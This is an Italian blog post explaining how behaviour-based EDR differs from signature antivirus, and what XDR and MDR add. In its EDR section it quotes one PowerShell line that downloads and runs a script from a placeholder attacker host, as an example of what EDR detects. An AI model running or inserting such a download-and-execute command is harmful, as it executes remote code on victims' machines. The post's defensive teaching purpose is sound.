Skip to main content
  1. Concetti/

EDR vs Antivirus - Behavioral Analysis e Response

Alessio Barnini
Author
Alessio Barnini
Table of Contents

Cos'e'
#

L'EDR (Endpoint Detection and Response) e' il successore moderno dell'antivirus tradizionale. Invece di confrontare l'hash di un file con un database di firme note, monitora continuamente il comportamento dei processi sul dispositivo: se qualcosa agisce in modo anomalo, l'EDR lo rileva e risponde, anche se quella minaccia non e' mai stata vista prima.

edr-mdr-xdr-security-techniques.webp

Monitora comportamenti anomali dei processi in tempo reale e abilita response automatica (quarantena, kill, isolamento rete), superando i limiti dell'antivirus basato su firma.

TL;DR
#

  1. Antivirus legacy = confronto hash file con database firme. Veloce, ma cieco contro zero-day: se il malware e' nuovo, non ha firma, passa inosservato.
  2. EDR = analisi comportamentale a runtime. Non guarda il file ma quello che fa il processo: se word.exe apre una shell PowerShell che si connette a internet, e' un alert, indipendentemente dalla firma.
  3. Fileless malware = vive in RAM, usa PowerShell/WMI, non scrive file su disco. Invisibile all'AV, visibile all'EDR che monitora le syscall.
  4. XDR estende l'analisi oltre l'endpoint: email, firewall, cloud, correlando dati da piu' fonti per rilevare attacchi complessi (lateral movement, APT).
  5. MDR = EDR gestito da un team SOC esterno h24. Ideale per chi non ha risorse interne.

Antivirus Legacy
#

L'antivirus tradizionale protegge calcolando l'hash di ogni file e confrontandolo con un database di definizioni di malware noti. E' un sistema reattivo: prima un malware deve essere scoperto e catalogato, poi l'AV puo' bloccarlo.

antivirus-signature-heuristic.webp

Il problema fondamentale e' strutturale: il database deve contenere la firma prima che il malware possa essere bloccato. Un attaccante con un payload zero-day che non e' mai stato visto supera l'AV senza problemi. Lo stesso vale per il polimorphic malware, che modifica il proprio codice ad ogni esecuzione cambiando hash, e per il fileless malware che non scrive mai file su disco.

antivirus-scan-modes-quarantine.webp

Dev parallel: un developer che firma i propri binari con Code Signing ottiene un trattamento preferenziale dall'AV signature-based, che vede il certificato del publisher come segnale di affidabilita'. Ma la firma e' sulla struttura del file, non sul comportamento a runtime. Un EDR analizza quello che il processo fa dopo l'avvio: connessioni di rete non previste, accesso a file di sistema sensibili, iniezione in altri processi. La firma non protegge da comportamento malevolo del software legittimo compromesso (cfr. SolarWinds).


EDR - Endpoint Detection and Response
#

L'EDR e' un agent leggero che gira sull'endpoint e osserva continuamente l'attivita' dei processi: syscall, connessioni di rete, accessi al filesystem, modifiche al registro. Quando un comportamento si discosta dal normale, l'EDR puo' bloccare il processo, metterlo in quarantena o isolare il dispositivo dalla rete.

Fileless malware e' l'esempio piu' illustrativo del vantaggio EDR: il codice malevolo viene eseguito direttamente in memoria tramite PowerShell o WMI, senza mai scrivere un file su disco. L'AV non ha nulla da scansionare. L'EDR vede il processo powershell.exe che esegue Invoke-Expression con codice scaricato da internet, riconosce il pattern e blocca.

Dev parallel: Invoke-Expression (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1') e' il pattern fileless classico in PowerShell. L'AV non vede nessun file su disco. L'EDR vede la syscall Net.WebClient.DownloadString seguita da Invoke-Expression e lancia un alert indipendentemente dal contenuto del payload.

LOLBAS (Living Off the Land Binaries and Scripts) e' una tecnica correlata: l'attaccante usa tool legittimi gia' presenti nel sistema (PowerShell, certutil, wmic, mshta) in modo anomalo. L'EDR rileva l'abuso anche di binari firmati Microsoft perche' guarda il comportamento, non la firma.


XDR - Extended Detection and Response
#

XDR estende la visibilita' dell'EDR oltre il singolo endpoint, raccogliendo telemetria da rete, email, cloud e correlando i segnali in un'unica piattaforma. Permette di rilevare attacchi complessi che un EDR singolo non vedrebbe perche' distribuiti su piu' layer.

Esempio pratico: un attaccante invia una spear phishing email (layer email), l'utente apre il documento (layer endpoint, EDR vede macro Office sospetta), e il malware si connette a un C2 (layer rete, firewall vede la connessione). XDR correla questi tre alert separati in un unico incidente con contesto completo.


MDR - Managed Detection and Response
#

MDR e' EDR come servizio gestito: il vendor fornisce la piattaforma EDR/XDR piu' un team di analisti SOC che gestisce gli alert h24, esegue il triage, risponde agli incidenti e produce report. E' la scelta di organizzazioni che non hanno un SOC interno ma vogliono una capacita' di detection and response matura.

Dev parallel: analogia con il monitoraggio infrastruttura. Un EDR e' come Prometheus + Alertmanager: raccoglie metriche, lancia alert, puo' eseguire azioni automatiche. Un MDR e' come affidarsi a un managed DevOps team che riceve quegli alert, li triaggia, e ti chiama solo quando c'e' davvero un incidente critico. Tu paghi per le competenze e la disponibilita' h24, non per il tool.


Collegato a
#

Related